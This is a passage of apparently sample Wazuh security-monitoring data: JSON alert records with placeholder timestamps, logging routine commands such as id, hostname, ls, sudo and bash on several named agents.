/usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: 